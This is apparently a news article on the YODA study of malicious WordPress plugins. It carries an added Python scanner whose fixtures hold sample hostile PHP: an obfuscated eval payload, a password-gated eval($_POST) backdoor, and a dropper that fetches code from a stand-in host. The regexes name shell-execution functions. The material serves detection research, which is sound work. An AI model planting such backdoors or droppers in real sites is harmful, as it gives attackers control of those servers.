YODA tool found around 47,000 malicious WordPress plugins installed on over 24,000 sites
As many as 47,337 malicious plugins were discovered on 24,931 unique websites, of which 3,685 plugins were sold on legitimate marketplaces, earning attackers $41,500 in illegal revenue.
The findings come from a new tool called YODA, which aims to detect malicious WordPress plugins and trace their origin, and are described in an 8-year study by a group of researchers from the Georgia Institute of Technology.
“Attackers posed as benign plugin authors and spread malware by distributing pirated plugins,” the researchers said in a new paper titled “Beware of Plugins You Need.”
“The number of malicious plugins on websites has steadily increased over the years, and malicious activity peaked in March 2020. Amazingly, 94% of malicious plugins installed over those 8 years are still active today.”
The large-scale study analyzed WordPress plugins installed on 410,122 unique web servers dating back to 2012, and found that plugins worth a total of $834,000 were infected after deployment by threat actors.
YODA can be deployed directly on a website or at a web-server hosting provider, or run by a plugin marketplace. In addition to detecting hidden and disguised malicious add-ons, the framework can also be used to establish a plugin’s provenance and ownership.
It does this by scanning server-side code files and their associated metadata (e.g., header comments) to identify installed plugins, and then performing syntactic and semantic analysis to flag malicious behavior.
The semantic model covers a wide range of red flags, including web shells, injection of new posts and functions, password-protected execution of injected code, spam injection, code obfuscation, black-hat SEO, malware downloaders, malvertising and cryptocurrency miners.
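To make the detection approach concrete, here is an added example (not the researchers' YODA code) of a toy plugin inventory and red-flag scanner: it identifies plugins from their WordPress header comments, then runs a handful of syntactic checks that map onto four of the behavior families listed above (code obfuscation, web shells, password-gated execution, malware download). The regex rules, the directory layout, the plugin names and the sample plugin sources are all constructed for illustration and are assumptions, not the real tool's rule set.

```python
"""Added example: a toy plugin inventory and red-flag scanner in the spirit of
YODA's syntactic pass. Not the researchers' tool; patterns, sample plugins and
layout are constructed for illustration."""
import os
import re
import tempfile
from typing import Dict, List

# WordPress plugin header comment: the metadata used to name a plugin and its author.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Author|Version)\s*:\s*(.+?)\s*$", re.M)

# Hypothetical syntactic red flags (assumptions, not YODA's real rules), each
# mapped to one behaviour family from the article.
RED_FLAGS = {
    "code_obfuscation": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "web_shell": re.compile(
        r"\b(eval|assert|system|passthru|shell_exec|exec)\s*\(\s*\$_(GET|POST|REQUEST)\b", re.I),
    "password_gated_exec": re.compile(
        r"md5\s*\(\s*\$_(GET|POST|REQUEST)\[[^\]]+\]\s*\)\s*===?", re.I),
    "malware_download": re.compile(
        r"\bfile_put_contents\s*\([^;]*?\b(file_get_contents|curl_exec)\s*\(\s*['\"]https?://", re.I),
}


def parse_header(source: str) -> Dict[str, str]:
    """Return the plugin header fields found in a PHP file (empty if none)."""
    return {k: v for k, v in HEADER_RE.findall(source)}


def scan_source(source: str) -> List[str]:
    """Sorted names of red-flag patterns that occur in one file's source."""
    return sorted(name for name, rx in RED_FLAGS.items() if rx.search(source))


def scan_plugins(plugins_dir: str) -> Dict[str, dict]:
    """Treat each subdirectory of wp-content/plugins as one plugin: take the header
    from whichever PHP file carries it and aggregate flags over all its PHP files."""
    report = {}
    for slug in sorted(os.listdir(plugins_dir)):
        pdir = os.path.join(plugins_dir, slug)
        if not os.path.isdir(pdir):
            continue
        entry = {"name": None, "author": None, "flags": set(), "files": 0}
        for root, _, files in os.walk(pdir):
            for fn in files:
                if not fn.endswith(".php"):
                    continue
                with open(os.path.join(root, fn), encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                entry["files"] += 1
                hdr = parse_header(src)
                if "Plugin Name" in hdr:
                    entry["name"] = hdr["Plugin Name"]
                    entry["author"] = hdr.get("Author")
                entry["flags"].update(scan_source(src))
        entry["flags"] = sorted(entry["flags"])
        report[slug] = entry
    return report


# Constructed sample plugin sources (not real marketplace code): one clean
# plugin, one "nulled" plugin with a hidden backdoor, one downloader.
SAMPLE_PLUGINS = {
    "good-plugin/good-plugin.php": """<?php
/**
 * Plugin Name: Good Plugin
 * Author: Example Dev
 * Version: 1.0
 */
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('good-plugin', plugins_url('style.css', __FILE__));
});
""",
    "nulled-slider/nulled-slider.php": """<?php
/**
 * Plugin Name: Nulled Slider
 * Author: Totally Legit
 */
eval(base64_decode('cGhwaW5mbygpOw=='));  // obfuscated payload
""",
    "nulled-slider/inc/helper.php": """<?php
// password-gated backdoor hidden in a helper file; placeholder hash
if (md5($_POST['pw']) == '0123456789abcdef0123456789abcdef') { eval($_POST['c']); }
""",
    "dropper/dropper.php": """<?php
/**
 * Plugin Name: Free SEO Booster
 * Author: Totally Legit
 */
file_put_contents(__DIR__ . '/cache.php', file_get_contents('http://example.invalid/p.txt'));
""",
}


def build_sample_tree() -> str:
    """Write the constructed samples under a temporary wp-content/plugins and return it."""
    base = os.path.join(tempfile.mkdtemp(prefix="yoda-demo-"), "wp-content", "plugins")
    for rel, src in SAMPLE_PLUGINS.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
    return base


if __name__ == "__main__":
    for slug, e in scan_plugins(build_sample_tree()).items():
        verdict = "SUSPICIOUS" if e["flags"] else "clean"
        print(f"{slug:15} {e['name']!r:22} by {e['author']!r:18} {verdict} {e['flags']}")
```

Two design points worth noting: flags are aggregated per plugin directory rather than per file, because the nulled plugin's backdoor sits in a helper file that carries no header at all, and the header fields are kept alongside the flags so that a marketplace or host can attribute a flagged plugin to a declared author (the provenance question the article raises). Regexes like these are only the syntactic layer; a real semantic pass would need to follow data flow from request parameters into execution sinks.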
Some of the notable findings are as follows:
- 3,452 plugins available on legitimate plugin marketplaces could be used to inject spam
- 40,533 plugins were infected after deployment on 18,034 websites
- Nulled plugins – pirated WordPress plugins or themes that have been tampered with to upload malicious code to servers – accounted for 8,525 of the malicious add-ons, with around 75% of pirated plugins cheating developers out of $228,000 in revenue
“By using YODA, website owners and hosting providers can identify malicious plugins on the web server; plugin developers and marketplaces can check their plugins before distribution,” the researchers pointed out.